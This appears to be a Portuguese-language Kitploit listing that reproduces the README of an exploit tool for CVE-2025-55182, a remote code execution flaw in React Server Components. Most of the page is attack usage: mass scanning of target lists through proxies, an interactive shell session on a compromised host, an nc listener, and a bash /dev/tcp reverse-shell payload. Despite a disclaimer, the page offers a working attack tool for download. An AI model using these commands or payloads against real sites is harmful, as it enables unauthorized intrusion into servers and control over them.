Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Scanner de vulnerabilidades críticas de RCE para React Server Components (CVE-2025-55182). Framework de exploração automatizado com suporte a múltiplos payloads, recursos de proxy e execução interativa de comandos. | Kitploit
Ferramentas/GitHubGitHub/alihzsec/cve-2025-55182
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

Scanner de vulnerabilidades críticas de RCE para React Server Components (CVE-2025-55182). Framework de exploração automatizado com suporte a múltiplos payloads, recursos de proxy e execução interativa de comandos.

Ver Repositório
1513há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner e Explorador CVE-2025-55182

[!Warning] Este repositório destina-se apenas a fins educacionais e de pesquisa.

  • Use os PoCs fornecidos exclusivamente em sistemas que você possui ou para os quais tem permissão explícita para testar.
  • Acesso não autorizado, exploração ou uso indevido de qualquer material neste repositório é ilegal.
  • O(s) autor(es) não assumem nenhuma responsabilidade por quaisquer danos, uso indevido ou consequências legais decorrentes do uso inadequado.

🔍 Visão Geral

CVE-2025-55182 é uma vulnerabilidade crítica de execução remota de código que afeta as versões 19.0.0, 19.1.0, 19.1.1 e 19.2.0 do React Server Components. Esta vulnerabilidade decorre da desserialização insegura de cargas úteis de requisições HTTP para endpoints de Funções de Servidor, permitindo que atacantes não autenticados executem código arbitrário remotamente.


🐛 Detalhes da Vulnerabilidade

ID CVE: CVE-2025-55182
Versões Afetadas:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 Instalação

Pré-requisitos

  • Python 3.8 ou superior
  • pip (gerenciador de pacotes Python)

Configuração

  1. Clone o repositório
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. Crie um ambiente virtual (recomendado)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. Instale as dependências
root@kitploit:~
pip install -r requirements.txt

📖 Uso

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

Argumentos

Argumentos

ArgumentoDescrição
-d, --detectionExecuta no modo de detecção (varre por vulnerabilidades)
-e, --exploitExecuta no modo de exploração (explora um único alvo)
-u, --url URLURL do alvo único para varrer/explorar
-l, --list FILEArquivo contendo lista de URLs alvo (apenas modo detecção)
-p, --proxy URLURL de proxy único (ex.: http://127.0.0.1:8080)
-pl, --proxy-list FILEArquivo contendo lista de URLs de proxy (um por linha)
-t, --threads NNúmero de threads simultâneas (padrão: 10, apenas modo detecção)
-s, --silentModo silencioso - mostra apenas alvos vulneráveis (apenas modo detecção)
-o, --output [FILE]Salva alvos vulneráveis em arquivo (apenas modo detecção). Se nenhum nome de arquivo for fornecido, usa o padrão: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugAtiva log de depuração - mostra detalhes da resposta e tentativas de repetição (não disponível no modo silencioso)

🎯 Modo de Detecção

Varrer um Único Alvo

root@kitploit:~
python3 main.py -d -u https://example.com

Varrer Múltiplos Alvos a partir de Arquivo

root@kitploit:~
python3 main.py -d -l targets.txt

Varrer com Proxy

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

Modo Silencioso (Saída Apenas Alvos Vulneráveis)

root@kitploit:~
python3 main.py -d -l targets.txt -s

Varredura Multithread

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 Modo de Exploração

Shell Interativo

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Em seguida, selecione [i] para shell interativo:

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

Reverse Shell

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Em seguida, selecione [r] para reverse shell e escolha o tipo de payload:

Opção 1: Payloads Padrão (Recomendado)

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

A ferramenta tentará automaticamente mais de 17 payloads de reverse shell diferentes até que um tenha sucesso.

Opção 2: Payload Personalizado

root@kitploit:~
Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 Referências

  • Comunicado de Segurança Oficial do React
  • Comunicado de Segurança do Meta
  • Comunicado de Segurança da Vercel
  • Comunicado de Segurança do Next.js
  • Detalhes do CVE

Se você achar esta ferramenta útil, considere dar uma estrela! ⭐
Feito com ❤️ para a comunidade de segurança
Baixar ferramenta